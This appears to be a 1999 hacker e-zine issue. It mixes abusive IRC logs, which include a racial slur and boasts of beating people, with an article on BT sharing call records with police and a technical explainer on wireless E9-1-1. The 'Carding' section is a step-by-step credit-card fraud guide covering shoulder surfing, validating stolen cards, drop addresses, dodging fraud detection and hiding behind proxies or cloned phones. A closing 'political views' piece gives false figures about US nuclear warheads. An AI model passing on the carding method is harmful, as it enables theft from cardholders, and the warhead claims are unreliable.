* hybr1d is away: (fucks sake) [BX-MsgLog On]
<oclet> stupid fuckin bot
*oclet* you fucked up too?
<[JaSuN]> to much time in front onf fuckin pc's
<hybrid-> fuck
<z0mba> fuckin playing football
<hybrid-> i want a fucking nurse to
<z0mba> no, so fuck off l4m3r
<z0mba> fuckin fast car
<hybrid-> yo werd up k4t fuX0r1ng, h4mpstuH li#1ck1ng, d0g a$$ sn1ffing,
g3rb1l r4pp1nG, m0nk3y fucK1nG, m0th3rfuck3rZ?
<downtime-> I hate that fucking Fatality
<downtime-> what the fuck hybrid?
<nino> heh What the fuck is up jason.
<tonekilla> well FUCK YOU
<tonekilla> FUCK YOU
<ch1ckie> NO FUCK YOU
<tonekilla> fuck
<nino> who fucken cares tk
<tonekilla> i dont give a fuck
<jason_> tk: don't fuck with nino bitch
<nino> ill tell u to relax if i fucken feel like it
<ch1ckie> FUCK YOU
<tonekilla> NINO IS MY FUCKING BRO
<tonekilla> IM NOT FUCKING WITH HIM
<tonekilla> fuck, ch1ckie has her pms and everyone jumps on my back
<downtime-> what the fuck is going on now?
<downtime-> another fucking fight?
<tonekilla> ch1ckie started it.... and no one fucking gives a shit
<nino> damn.. i would fuck mary jane in a heart beet
<tonekilla> you dont fuckng ban someone with everything that happens
<tonekilla> motherfuckers stop
<downtime-> WHAT THE FUCK IS WRONG WITH YOU PEOPLE?!
<oclet> if you dont agree with me, fuck off ;P
<nino> dude i am just fucken with ya
<jason_> And I ain't really never gave a fuck how niggaz feel
* hybrid_ is wondering what the fuck is going on with these ppl
<hybrid_> EVERYONE SHUT THE FUCK UP
<hybrid_> fuck you
<tonekilla> you didnt get banned for no fucking reason from a channel you
properly ran for 3 months then someone comes in, kicks and bans you and
fucking turns it into a dynasty
*downtime-* what the fuck is going on?!
<hybrid_> tone shut the fuck up
<z0mba> for fucks sake, its only irc
<tonekilla> FUCK YOU
<nino> WHAT THE FUCK OClet
<jason_> fuck the big yellow
<prez_> this flaw is so fucking simple.
<DTMFslut> fuck
<hybr1d> it's all fucked
<prez_> irc = fucked, all day, everyday:)
<sonicborg> fucking good stuff.
<simmeth> fuck
<gossi> got fuck loads of cc cards
<simmeth> get speech pro u lazy fuck
<gossi> all these fucking kodes still work
<gossi> fucked off
<gossi> fucking poor NT admins
<gossi> FUCKING HUGE BILL~!~#
<DgtlFokus> mother fucker
more cf1sh logz } this kid called me weired, i dunno why!@" - hybrid
---------------
Session Start: Sun May 16 15:21:22 1999
<z0mba> sup?
[15:21] <cfish> ok well not really
[15:21] <cfish> did you put up the thing on barby.org
<z0mba> nope
<z0mba> jasun did
[15:22] <cfish> why
<z0mba> cos ur lame i guess
[15:22] <cfish> why you reckon that
<z0mba> i thought we were talking about why jase put it up
<z0mba> not what i thought
[15:24] <cfish> ok fine but personnaly what do you think
<z0mba> pretty much the same thing
<z0mba> you haven't done anything to prove yourself otherwise
[15:25] <cfish> lame or just nothing
<z0mba> lame
[15:26] <cfish> but why i dont get it
<z0mba> your ereet man, read faith 5
<z0mba> when its out
[15:27] <cfish> when its out i will but why you reckon im lame?
<z0mba> just do
[15:28] <cfish> there must be a reason
[15:28] <cfish> i barely know you
<z0mba> aww, poor little diddums
<z0mba> dood?
<z0mba> why u cry about it?
[15:33] <cfish> yes
<z0mba> prove me wrong
[15:33] <cfish> just a bit annoyed
[15:33] <cfish> you cant trust anyone
<z0mba> i know
[15:34] <cfish> what you want me to do give you 3 outdials a world calling
card ~voice mail boxes etc?
[15:34] <cfish> lol
<z0mba> lamer
<z0mba> outdials and vms's are lame
<z0mba> my mum could get them
[15:34] <cfish> i know vms's are lame
<z0mba> show me u r eleet
[15:35] <cfish> you call a way of grabbing calling cards from 2 meters away
from a payphone and having it displayed on a lcd display lame?
<z0mba> yup
[15:36] <cfish> im glad your so eleet
<z0mba> why thankyou, so am I
<z0mba> come on man, prove me wrong
[15:36] <cfish> so could you do that with the calling cards?
<z0mba> prove you can grab calling cards from 2 meters away and have it
displayed on an LCD
<z0mba> and i won't think u are so lame
[15:37] <cfish> good i will
<z0mba> and then prove yourself properly
[15:37] <cfish> you know hearing aids
[15:37] <cfish> set to mode T
[15:37] <cfish> they can pick up phone conversations
<z0mba> lame
<z0mba> everyone knows that
[15:38] <cfish> i know
<z0mba> that is in loads of old skool texts
[15:38] <cfish> but if you make a circuit...
<z0mba> tell me something thats *not* lame
[15:38] <cfish> that reckognises when you press 144
[15:38] <cfish> and then decodes the rest until you press stop
[15:38] <cfish> and displays it on a LCD
[15:38] <cfish> is that lame
<z0mba> give me circuit schematics then
<z0mba> cos that don't prove nothing
<z0mba> i could say "make a circuit that decodes secret MI5 government
transmission", but that wouldn't make me eleet would it
<z0mba> *prove*
<z0mba> remember that word?
[15:41] <cfish> true but im working on it
<z0mba> so you haven't actually done it yet?
[15:41] <cfish> no
[15:41] <cfish> but in theory it will work
<z0mba> l4m3r
[15:42] <cfish> but now im not going to publicise it
<z0mba> lots of things werk in theory
[15:42] <cfish> true and lots in practise as well
<z0mba> shame u r so lame really isn't it
<z0mba> so basically, all u want is phr33 calls
<z0mba> lame
<z0mba> lame
<z0mba> lame
[15:42] <cfish> ask the person who helped you make uphreak.8m.com if im lame
*** <=- °SD v8.5 PrO° -=> (cfish) Is Not On IRC Right Now !
*** <=- °SD v8.5 PrO° -=> (cfish) Is Not On IRC Right Now !
Session Close: Sun May 16 15:43:21 1999
downt1me } this dude is EV1l, evil i tell ya..
-------------
<downtime-> I kicked the kid's ass
<downtime-> I got my foot, and placed it on his forehead ;)
<downtime-> then i got my fist and beat his face to shit.
<hybr1d> LOL
<hybr1d> you're an animal
<hybr1d> lol
<downtime-> it was fun..
<downtime-> indeed..
<hybr1d> :>
<downtime-> no one fucks with me.. ;)
<hybr1d> same here
<downtime-> cuz i wil grab a chair and hit them with it
<downtime-> or a pencil or anything!
<hybr1d> LOL!
<downtime-> the best thing to do is always if ya dont have a clear shot to
the head, go for the knees. ;)
<downtime-> take them down..
<downtime-> then kick the shit outta them
<downtime-> then get a pipe and break it over their backs
<hybr1d> LOL
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ BT conspiracy ]::::::::[OO--[ postal phreak ]---------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
ANYONE READING this may already have had details of who they telephone or are
phoned by fed into police computer files, it emerged last week after details
of automatic links between BT and police computers were described in public
for the first time. Delegates to an international conference on economic
crime in Cambridge were told that the number of requests for BT data from the
police and other agencies was doubling every year, and could involve
thousands of people in the course of just one investigation.
Not just phone calls are now logged
into police computers, it was revealed.
All vehicles entering or leaving the City of London or British seaports are
being watched by robot automatic number plate scanners (ANPS), which feed the
data to the Police National Computer (PNC) in Hendon. The PNC replies within
five seconds if the vehicles are of interest to police. Daryl Godivala, head
of BTs Network Special Investigations Department, explained to the conference
that BT has met ever-increasing police demands for details of customers calls
by installing an automated computer-to-computer interface to feed call
information out. Unlike telephone tapping, warrants are not required before
confidential data is sent out by BT.
All British telecommunications operators, including mobile phone airtime
suppliers, are storing and handing over this information, although only BT
runs an automated system. BT says this has been done to minimise cost in the
face of escalating and hitherto uncoordinated police requests. Other UK
telecommunications companies and mobile phone operators normally supply data
only on paper.
Currently, BT receives and processes about 1,000 requests a week, Godivala
indicated. Most requests were for details of subscribers names and addresses,
he said, rather than the numbers they had called. But the traffic in personal
call information is already so large that two British firms have produced
special software to automatically process BT telephone call data for
intelligence purposes. These systems - called iTel and CaseCall - are
currently used by every British police force, as well as by Customs, MI5 and
the National Criminal Intelligence Service. Once received, the data is sifted
and transformed into pictorial networks and charts of who talks to whom. To
these are added bank records, housing information, vehicle details, and
information from inquiries, newspapers, the Net and informants. The resulting
charts are often so comprehensive and complex as to back up the most robust
of paranoid nightmares. But is it only the guilty who have cause to be
worried about the new intelligence systems?
According to intelligence analysts who have designed and used telephone call
analysis systems, a single investigation - particularly drugs cases - can
eventually result in requests for information about calls made by hundreds or
even thousands of telephone customers. Names and addresses of customers
called by a suspect are traced and fresh requests sent in to get their calls.
The result is an ever-widening circle of people who have been called by
people who have been called (and so on) by the original suspect.
One Cambridge detective present claimed that this method had worked well for
his force after he had downloaded information on thousands of calls and used
it to help break a computer theft ring. Cambridgeshire police crime analyst
Cliff Nicklin said 500,000 of stolen equipment had been recovered.
In theory, all requests for BT information such as the name and address of a
particular subscriber, or the numbers they have called over the previous
three years, have to be approved by a senior police officer, of the rank of
assistant chief constable or above. In practice, the senior officers approval
is delegated to more junior officers operating the link computer, and is
forwarded automatically from their computers to BT - whose computer centre
authenticates the request, and then downloads the information required.
Foreign police and security specialists expressed surprise at the scale and
growth of the British telephone surveillance system. In the US, Canada and
most European states, a judicial warrant (at least) is necessary to have
access to telephone call records. An official from the Canadian Security
Intelligence Service said he was astonished that such privacy-sensitive
information was so freely handed over. A French investigating magistrate said
that in France the police would not be permitted to have such information
without judicial approval.
Inevitably, many of those whose telephone numbers are caught in the ever-
enlarging web of a criminal investigation will be innocent of any involvement
other than sharing the same dentist, doctor, school or uninvolved
acquaintances. They could even have been a victim of the suspect - or just a
wrong number. Unlike the guilty, however, the innocent have no right to know
that their personal telephone call information has been downloaded by BT into
police, customs or security service computers. The Data Protection Act
requires both the police and BT to keep full records of disclosures. But the
subject whose privacy has been breached is not entitled to find out that
disclosure has taken place, even long after an investigation has been
concluded.
The BT-police interface was one of a range of novel police resources
explained to delegates concerned with fighting international fraud and
economic crimes, especially on the Net. They were also told about the latest
developments at Britains PNC which, according to PNC director John Ladley,
are leading to much better support for intelligence-led policing. Many new
systems had been introduced in the mid-1990s, and more were scheduled. Among
these were Quest, which can search the 5.5 million names in the Criminal
Names index by reference to factors including accent, associates, habits,
places and addresses, and even shoe sizes. The recently enlarged names index
also includes information about DNA samples and photographs, and is linked to
a 4.25 million name fingerprint index. Quest was expected to be fully
operational early in 1998.
For vehicles, the PNC is offering Vods - a vehicle owners descriptive search
- which can answer questions such as: who owns a blue Volvo and lives in this
postcode district? Searches like that have previously been too time-consuming
to be used in most cases. Ladley also expects the use of automatic number
plate scanners to rise dramatically as more and more police chiefs decide
they want them. Currently, scanners send in up to 80,000 checks a day. The
PNC anticipates that this use will soon quadruple. All such inquiries are
stored for data protection and auditing purposes. This means that historical
records from the ANPS system could also be mined, for example to analyse
patterns of foreign travel. The little-noticed and still progressing
revolution in police information technology has resulted in the employment of
growing numbers of police intelligence analysts who use powerful computer
systems to visualise and analyse the meaning of the massive and growing data
inputs from cameras, telephones and bank records as well as traditional
police sources. Neither these jobs nor the computers to back them up existed
in the 1980s.
Britains market leaders in intelligence systems are two Cambridge-based IT
companies, who showed off their latest wares last week. One of them, i2,
claims its Analysts Notebook is used by all British police forces. The
Notebook was used to produce charts for such high profile cases as the
Frederick and Rosemary West murder case and for City fraud investigations.
i2s Web site (http://www.i2ltd.demon.co.uk) offers an animated demonstration
of how investigative charts are assembled from myriad data inputs. The
company describes its network analysis sub-system as particularly useful for
Internet traffic, as well as for telephone transactions and [bank] account
transfers. The Harlequin group (http://www.harlequin.com) says that its
system, Watson, is used around the world to investigate fraud, drug
trafficking and organised crime. It too produces large and elaborate charts.
Watson is designed to draw information directly from the standard Home Office
large major inquiry system - Holmes for short. Watson uses artificial
intelligence techniques to automatically distinguish relationships between
people, places and objects from the data that is fed in. For the potentially
guilty but not the innocent, recent legal changes mean that defendants can
level the playing field by asking the police to hand over their databases.
The 1996 Criminal Procedures and Investigations Act requires the police to
record inquiries from beginning to end, and to reveal all their material -
used or unused - to the Crown Prosecution Service. If information given to
the CPS suggests that the the defendant might be innocent, or casts doubt on
the reliabilty of prosecution witnesses, the defence has to be told.
Judges have already made at least two orders for the police to copy Holmes
databases for the defence to analyse. On the first occasion, however, defence
lawyers had no idea how to read the data they were sent. In the second case,
which is still sub judice, specialists have been retained to advise on how to
interpret and analyse the police data. Both sides of the courtroom are thus
having to come to terms with the new era of electronic transparency. But, as
the law stands, the innocent and uninvolved still have no right to know - let
alone protest - that their data too has been mined and warehoused for future
use.
These latest findings add more threat to us the phreaking community.
-PostalPhreak
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Wireless E-9-1-1 ]::::::::[OO--[ by digiphreq ]-------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Wireless Enhanced 9-1-1 Service- Architecture and future.
By Digiphreq <digiphreq@webcrunchers.com>
Darkcyde Communications 5/8/99
darkcyde.8m.com
"A nerd is somebody who's life is focused on computers
and technology. A geek is somebody who's life is focused
on computers and technology and likes it that way."
Ye Ol'' Table of Contents
I. Introduction
II. A Bit of History
III. FCC Regulations on Wireless 9-1-1
IV. Common Wireline 9-1-1 Service
V. Issues on How to Make Wireless 9-1-1 Work
1. Stage 1
2. Stage 2
VI. Long Term & Conclusion
I. Introduction:
As you probably very well know Enhanced 9-1-1(E9-1-1) is the most common for
of 9-1-1 these days. It is possible to find B9-1-1, if you live in the
middle of no where... Anyway today wireline E9-1-1 relays all the important
info on you. Location, name, and the telephone number to the dispatch
telecommunicator which then accurately routes your call to the proper
Emergency Dispatch Station. In theory this makes the whole process faster,
as to get you help quicker. Which is often not the case. With the current
day workings of wireless networks, E9-1-1 isn't really possible. They have
begun to incorporate technologies to support it though. This is all because
of a bunch of new regulations which the FCC placed on wireless
communications, which called for an improvement of the use of E9-1-1.
Originally in 1996 they created a two stage time line, which I will be
explaining later. A quick overview is that Stage one will require wireless
networks to provide the user's call back number and the location including
which cell sector they are in. Stage two allows for a more precise pin point
of the caller's location, which requires a bit more hardware and technology.
I will touch on a brief history of Wireline E9-1-1 service, Wireless E9-1-1
service operations(how it should work), and a more detailed overview of the
Two stage process involved in upgrading the current Wireless system.
II. A bit of History:
The first 9-1-1 service, was introduced in Alabama in 1968. It's also known
as Basic 9-1-1 or B9-1-1. This was a very primitive version of E9-1-1 which
only routed your call to a local police station. In the 1980's B9-1-1 was
enhanced and there was the introduction of E9-1-1.
Database Automatic
_ Management Location
/ \ System Info |
/ \ | |
_____ | |
: : Emergency |
: : Service |
:_____: Adjunct |
| | |
| | |
| | |
| 5ESS switch |
Central E9-1-1 |
Office _________selective_____________PSAP
router \
(routes Ani) \___ Displays:
Location
Call back #
Mapping Location
As you can see (sort of) when a residential or commerce line dials 911, there
call goes to the central office switch which routes their call to a E9-1-1
selective router. Which then routes the call to the correct PSAP based on
the user's telephone number. The phone number is passed from the PSAP to the
Customer Premises Equipment (CPE), which it uses to look up an Automatic
Location Information (ALI) database for the user's name and address. On top
of all this the user's line number is then used as the call back number in
case the caller accidentally hangs up(Ex. the killer hangs up the phone for
them...) or the PSAP dispatcher needs to call the user back.
III. FCC Regulations on Wireless 9-1-1
(This Was Borrowed)
Points of Interest in the FCC Ruling Over Wireless 9-1-1
-Wireless carriers must support call routing based on cell sector,
and they must also convey information sufficient to enable the PSAP to call
back the 9-1-1 caller(that is transmit the calling party number) within 18
months of the ruling's effective date. This requirement is sometimes called
Stage 1.
-Carriers must support deployment of technology to determine a caller's
location within 125m of accuracy for 67% of all wireless 9-1-1 calls
within five years effective date. Support of a specific location
determination, which will require PSAPs to be able to handle coordinates
rather than street addresses, is sometimes called Stage 2.
-The FCC will entertain waivers on a case by case basis for not complying
with the rules.
-Any call from a handset having a MIN must be transmitted to 9-1-1 even if
the handset no longer has valid service. The call may not be intercepted
or blocked. The local PSAP may decide whether or not to receive calls from
non-MIN telephones, for example phones that were never service activated.
if a PSAP requests these calls, the carrier is supposed to provide them.
-The ruling applies to cellular, broadband PCS, and geographic area SMR
providers (meaing SMRs that provide mass market services). Systems
provided
by movile satellite communications vendors, such as Motorola's Iridium, are
not covered by this ruling.Because it is not a federal issue, the FCC has
determined that localities and states should plan for cost recovery at
their levels. Details of subsidization for deployment and nonsubscriber
calls must be negotiated on local level (State or municipality, similar
landline 9-1-1 subsidization). Funding should be available for both basic
and enhanced 9-1-1.
Conditions for Compliance:
1. PSAPs must request and be ready to handle wireless location information.
2. A cost recovery mechanism (negotiated at the local level) must be in place.
PSAP Choices:
Because of the two conditions for compliance PSAPs effectively choose
implementation dates.
PSAPs also get to choose whether they want to handle calls from handsets
without MINs.
Further Rulings for the Future:
- Tightening of location accuracy requirements to 40 feet 90% of the time,
- Availability of altitude information,
- Performance criteria on time for calling completion,
- Consumer Education programs for wireless 9-1-1,
- Possible reconsideration of issues of PSAP choice, and
- Possible requirement that the strongest signal must carry the 9-1-1 call.
IV. Common Wireline 9-1-1 Service
Today in most areas wireless communication networks have the ability to run
off of B9-1-1. This is because of the AUTOPLEX 1000 System. Basically a
caller can dial 9-1-1 and be connected to the proper ASAP based on the
location of the serving cell. Location routing is accomplished with a digit
by digit method. Which allows Automatic Number Identification (ANI) for
Centralizing Automatic Message Accounting (CAMA) signaling to field a number
corresponding to the serving cell. Upon arrival at the E9-1-1 selective
router the field issued to show the PSAP for that area. The call is then
routed. An alternative to this would be to populate the ANI field with a
7-digit dial-back number as opposed to the location information. The E9-1-1
selective router then assigns the incoming trunk one of four NPAs. The
remaining seven NPAs complete the 10-digit dial-back number.
V. Issues on How to Make Wireless 9-1-1 Work:
There are several wireless problems which limit the use of E9-1-1. First
CAMA trunk signaling transmits one 8-digit telephone number to the PSAP. This
causes problems because it can only have 4 NPAs, and therefore cannot give
caller identification while wireless subscribers are roaming. Second the
caller's telephone number cannot be used to route a wireless E9-1-1 call
since the caller's location depends on the Mobile Directory Number (MDN).
Since a real street address cannot be associated with a MDN, the dispatcher
cannot dispatch emergency services. So while this could seem kind of
hopeless its really not. A lot of other ways have been devised to handle
this all. Which commonly involve in band analog MultiFrequency (MF)
signaling. I'll start out with some bad idea's then explain the good one.
There was the Group D signaling solution. It was first intended for equal
access upon long distance calls. It was able to support both a 10-digit ANI
and a 10-digit dialed-digits field. Essentially the dialed-digits field
could be used for the location information. The problem with this method(and
you knew the would be a problem...) is that it cannot support an interface
between a Mobile Switching Center (MSC) to the selective router as does
Signaling System 7 (SS7). Next there was a method which used a conversion to
CAMA from Group D signaling. This method is fairly complicated and really is
degrading with performance, which makes it a bad choice... here goes an
explanation. With the idea that MSC cannot provide SS7 connectivity with the
PSTN and the 9-1-1 selective router cannot support SS7 or Group D signaling
for 9-1-1 call processing. With a Group D to CAMA translation device between
MSC and the selective router, it could provide signaling conversion. The
translation device has a third field which sends the 10-digit dial-back
number and location information to the ALI database during call set up. The
device send s a special 7-digit key value in the ALI field to the selec
tive router. Basically then this key would represent the cell from which the
call was placed to the router. Then the 7-digit key field is routed to the
PSAP during the setup. Meanwhile the ALI runs a check by the PSAP using this
keys value or field, then it would return the real 10-digit MDN. Next we
have a expanded CAMA signaling solution which has no practical reason for
existing. It just won't work. I'll explain it anyway. The existing CAMA
interswitch 9-1-1 signaling maybe built upon to support a 10-digit ANI and
10-digit location number. This requires some modifications to be made to the
current PSAP hardware and the 9-1-1 selective router. This would cause a
degradation of the performance due to extra MF signaling involved. Finally
we have the practical solution which is what was used mainly for the Stage 1
process. Which is a solution through SS7, which should make hybrid's day.
He just can't seem to get enough on SS7. The use of SS7 will be explained in
my explanation of what Stage 1 was.
Stage 1:
Basically an entirely new architecture is needed. The common setup
was to distribute the service processing across the AUTOPLEX System 1000
MSC, 5ESS-2000 Switch, Emergency Services Adjunct (ESA), ALI database,
associated database management system, and the PSAP CPE. The MCS used ISDN-
UP Signaling to convey a 10-digit dial-back number in the charge number
parameter, as well as location information in the caller party number. The
9-1-1 selective router uses the location information to route the call to the
appropriate PSAP. An ISDN PSAP is required to receive and use both the 10-
digit dial-back number and the location information. Some major improvements
to the AUTOPLEX System 1000 were put in to affect for Stage 1. The CAMA
signaling is replaced with ISDN-UP which has the obvious advantages of being
able to transmit both dial-back number and the location information as
opposed to CAMA signaling 8-digit information. Also CAMA signaling only
supported a 7-digit calling party number unique with one of four area codes,
where as ISDN-UP will support the full 10-digit calling party number.
Another major change was in MSC, which was to then use ISDN-UP signaling as
well. Which could convey a 10-digit dial-back number in the charge field and
a 10-digit routable Directory Number (DN) which represents the cell location
and originating service provider in the called party number field. Basically
this is used to reach roaming customers. The use of a DN allows a call to be
routed through the PSTN to the E9-1-1 selective router grouped with the PSAP
without direct connection trunks. The E9-1-1 selective router then selects
the appropriate PSAP based on the serving cell, call type, and some other
less important criteria. To support this, the dialed-digit routing
capability must be integrated with the 5ESS-2000 switch E9-1-1 feature, thus
allowing these calls to be routed using the called party number rather than
the ANI. Location information, dial back number, and service provider are
forwarded to the PSAP via ISDN during call setup. An ISDN PSAP is required
to receive and use both the dial back number and location information encoded
in the dialed digits. In the case where the PSAPs cannot support ISDN and
enhanced adjunct processor interface (API) will provide the ability to
support existing PSAP CPE, which uses CAMA in-band signaling. The
information received via enhanced SS7 ISDN-UP from the MSC to the 5ESS-2000
will be forwarded over the API when the ESA queries made for routing
information. The information will then be forwarded to the ALI over a new
ESA to ALI interface. The 5ESS switch will then pass a unique 7-digit key
value to the PSAP in the ANI field. When the ALI is queried by the PSAP with
this value, the location, service provider and dial back number is returned
to the PSAP. The PSAP equipment would need to be enhanced to provide the
caller's location to the telecommunicator using a textual method whereby the
called party number is used to query the ALI database, which provides
location and identification of the cell/sector. Alternatively, Geographic
Information Systems (GIS) can be used to provide a geographic representation
of a caller's approximate location on a computer-generated map. The PSAP GIP
map displays provide the dispatcher with visual identification of the
caller's location (their cell/sector) in perspective of other important
geological locations. The displays can pinpoint roads, addresses, buildings,
houses, ems dispatch vehicles, fire hydrants, cell sites, and the service
boundaries to emergency services. Ok so since this was originally put to use
back in 96 and was to last as a period for approximately 18 months, it has
for the most part gone in to affect in most areas. It's hard to say though,
depending on the area....
Stage 2:
Stage 2 is basically just an architectural build on what was created
in Stage 1. The implementation was to last near 5 years. Stage 2 would
bring new GIS capabilities along which would work better with the wireless
E9-1-1 system. During this stage the geolocation system was required to meet
the FCC's 5 year requirements for wireless E9-1-1. So the wireless system
could communicate with the geolocation system to determine the position of a
target mobile terminal (which has dialed 9-1-1). Alternatively, if the
wireless system recognizes a mobile telephone equipped with GPS the mobile
terminal could provide its current location via new air interface messages.
Several technologies have been proposed to meet the FCC's long term mobile
locating requirements for wireless E-9-1-1 systems. To meet the needs of the
9-1-1 community that is to those who provide the emergency response service
to the public, the existing base of mobile phones must be supported without
modification. Promising technologies proposed for this purpose include time
difference of arrival and direction of arrival triangulation systems. Each
has its advantages depending on the physical environment in which it is
targeted to be deployed. In addition, advances in GPS receiver technology
have made it possible to integrate GPS with wireless telephones. Which has
been recently brought somewhat into the commercial market. If the mobile
terminal knows its location, it makes sense to use this information for the
E9-1-1 system because the GPS is potentially much more accurate than a
location determined by means of time difference of arrival and direction of
arrival triangulation. The geolocation information (latitude, longitude,
altitude, and accuracy) will be integrated in an SS7/ISDN-UP and ISDN call
set-up message for the 9-1-1 call. At this point in the evolution, SS7/ISDN-
UP and the Transaction Capabilities Application Part (TCAP) signaling
protocols will be modified to support transmission of the location
information from the wireless system to the selective router. ISDN-UP will
be used for delivery of location information with call set-up while TCAP
messages will be used to support caller location tracking, which requires
location updates during a call. Regardless of the location technology used
by a wireless service provider, the location information will be passed
through the network and used in a standard way. Therefore, the E9-1-1
communications network infrastructure will remain implemented in the wireless
network. Although not required by FCC rule making, the new location
information can be used to route a call to a PSAP accurately. Upgrades to
support this capability include geolocation routing capabilities that will be
integrated into the 5ESS-2000 switch's E9-1-1 feature, the ESA, and the DBMS.
Once again, the information is delivered to the PSAP, and computer aided
dispatch systems with GIS mapping will used to portray the information in a
way that makes it easily understandable by the telecommunicator and
responding emergency personnel. In turn, the improved location information
will be reflected in the GIS map display with a pinpointed location and
associated accuracy representation. A GIS based service administration
capability will proceed the ability to define and dynamically change
municipal jurisdictional boundaries and emergency service zones via a
computerized map interface. This administration system will indirectly
maintain the call routing data used by the 9-1-1 selective router. The
process will simplify the administration of the 9-1-1 service by eliminating
the need to share cell/sector location data among wireless, local exchange,
and emergency service providers. In this environment, base station
reconfigurations by a wireless service provider will no longer affect the
data maintained in the PSTN and PSAP providing the end-to-end E9-1-1 service.
Onward to my brief explanation of triangulation and geolocations. Network
based triangulation methods of location (TDOA and DOA) require that at least
two DOA or three TDOA receivers locate the target mobile terminal and that
some technique be available to resolve ambiguities caused by multipath
propagation. These requirements may be difficult to meet in many wireless
environments causing the accuracy of the locating system to be degraded or
making system deployment cost prohibitive. For example, in rural
environments, cell sites cover very large geographical areas, often resulting
in marginal voice coverage on the fringes of the cells. In such areas, it is
unlikely that receivers in multiple cell sites would "see" the mobile
terminal, thereby, making it difficult or impossible to establish the
caller's location. This problem could be worked around by adding
supplementary location receivers, although such deployment might be very
costly for rural wireless service providers. Furthermore, in dense urban
areas, the effect of multipath propagation becomes a dominant factor in
deterioration of the accuracy of the locating system. Multipath propagation
refers to multiple copies of the same transmitted signal are received by an
antenna. Usually, the first signal arrives via the most direct path from the
transmitter. Additional copies of the signal are received at later times,
ranging from hundreds of nanoseconds to tens of microseconds later, and they
then overlap the first signal. These copies result from the reflection of
the original signal from various objects, such as buildings and vehicles.
The effects of multipath propagation particularly in cities can degrade the
precision of the location estimate to such a point that no added benefit can
be gained over visually reporting the serving cell/sector location because
urban environments often have relatively dense micro cell grids for their
wireless networks. These problems are difficult to overcome without some
assistance from the mobile telephone. Whether or not the FCC requirement of
125m accuracy will be technically or economically feasible in such
environments is not clear.
VI. Long Term & Conclusion
Although recent FCC ruling only requires location accuracy of 125m in 67% of
all cases, the public safety community often requires even more accurate
information. Ideally an emergency unit responding to a 9-1-1 call would know
exactly in which room in a skyscraper which the incident is occurring or has
occurred(using for instance the ISDN-UP altitude parameter). Clearly this
level of accuracy cannot be achieved cost effectively with unmodified
wireless phones and today's technology. With new technology and assistance
from the mobile terminal, however future land based location systems will be
able to provide much better accuracy than that of the FCC Stage 2
requirements. Although such systems are not available today, several
concepts have been proposed for example signpost location beacons and
specialized signaling schemes optimized for location purposes. Whatever
scheme becomes dominant as the technology matures, the pursuit of standard
implementations is important. This will insure that the cost as sociated
with an improved wireless E9-1-1 system are reduced. Basically really from a
safety stand point all this is really fine in my opinion. It will help save
other people and possibly yourself one day. Meanwhile this isn't really a
cell user's friend. This gives the wireless service providers more control
over you with this type of technology, which can be looked at as a very bad
thing. Anyway, peace.
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Carding ]::::::::[OO--[ by kryptus ]------------------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Hello boys and girls welcome and listen up as I am about to put some
data in that little brain of yours.Well let me tell you carding has changed
so much since I first started but now I have quit and have moved on to other
things and would like to pass my knowledge down to you young'ns.Well to start
off when trying to find a CC never go dumpster diving its nothing but a thing
of the past.It can be done but is very hard to do.The best way is to shoulder
surf or to work at a job where they use Credit cards such as a store in the
mall.The way to find out how much is left or if it works is to use a merchant
# these are used by sales people to validate that a CC works correctly.There
are two ways to do this find a port site or phone # and enter in the CC info
and if it works you might have yourself a CC but a much better way is either
an online or phone merchant this gives you details on the limit and how much
is left to spend.Next you need to find yourself a nice place to card this
stuff to and no matter what never ever ever ever card to your own house.Find
an abandon apartment or house and leave a note on the door if you know the
delievery date or just leave it on their with a message saying I am currently
moving in and please just leave my package in front of my door or behind some
bushes and then you need to make sure no one is watching you make sure this
drop area is far away and not next door,because when the police come by the
first ask the neighbors thats you questions and investigate.Also now a days a
computer monitors CC use so if someone usually orders 50-200 dollar stuff
each time they use it and then a 500 dollar charge appears the card is frozen
and call the owner of the card on the number given no matter what number is
given to the clerk and is verified to make sure it is not fraud so I suggest
only buy small things under 200 dollars that way you actually can get what
you want so dont try and order a laptop trust me it wont go through.What you
should buy is either clothes,CDs, RAM ,Modem,or anything thats doesn't say
expensive when you think about it.Now to try and not get caught.Well either
use a proxy server when you do this so your IP wont be on their server
because each time you order they keep your IP for refernce to find out who
made the order.Also if you are on Dial Up they can easily find you if you
dont use a proxy notice when you log in notice the word LOG yes they log what
phone # use this IP at what time so your ISP could easily find out who it
was.Or if you call which is much better and safer call from a payphone or a
cloned cell phone and never your home phone because the companies use ANI and
generally *67 or but maybe an op divert will but I strongly suggest the first
two methods listed.Becareful and dont get caught.
This has been brought to you by Kryptus
kryptus@deep-house.com
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Political views ]::::::::[OO--[ by nino ]-------------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.-. .-.
.--' / \ '--.
'--. \ _______ / .--'
\ \ .-" "-. / /
\ \ / nino \ / /
\ / \ / [ Poloticol Views ]
\| .--. .--. |/ [ Volume One ]
| )/ | | \( | [ nino ]
|/ \__/ \__/ \| []
/ /^\ \
\__ '=' __/
|\ /|
|\'"VUUUV"'/|
\ `"""""""` / [ Greets : Darkcyde ]
`-._____.-' [ hybrid ]
/ / \ \ [ darkcyde.8m.com ]
/ / \ \
/ / \ \
,-' ( ) `-,
`-'._) (_.'-`
--------------------------------------------------------------------
Politicol views: .'`Nuclear Warheads`'.
Many of us know about the United States Army, And how they work.
But allow me to explain in detail some of the problems the U.S Faces
By witholding a Nuclear Warhead. The Major problem is that there are
other countries trying to make warheads to be able to compete in the
United States Strategic Warfare, Minor Authority in communications
and prospects. These countries such as kuwait, kosovo, and many others
feel like they are being controled by the U.S military and the army.
But what is it they Realy Fear ? is it our population count for our
armed services,? is it out communications\technology power ? or is it
the Nuclear Bombs, Yes indeed. it is. The United states have 7 nuvlear
Warheads known to public that are stationed in multiple spots around
the country. There is just one problem. what about the other 11 Secret
Warheads that the U.S has. ? yes indeed. the United States Government
has a total of 18 nuclear warheads ready for use. That is alot of power.
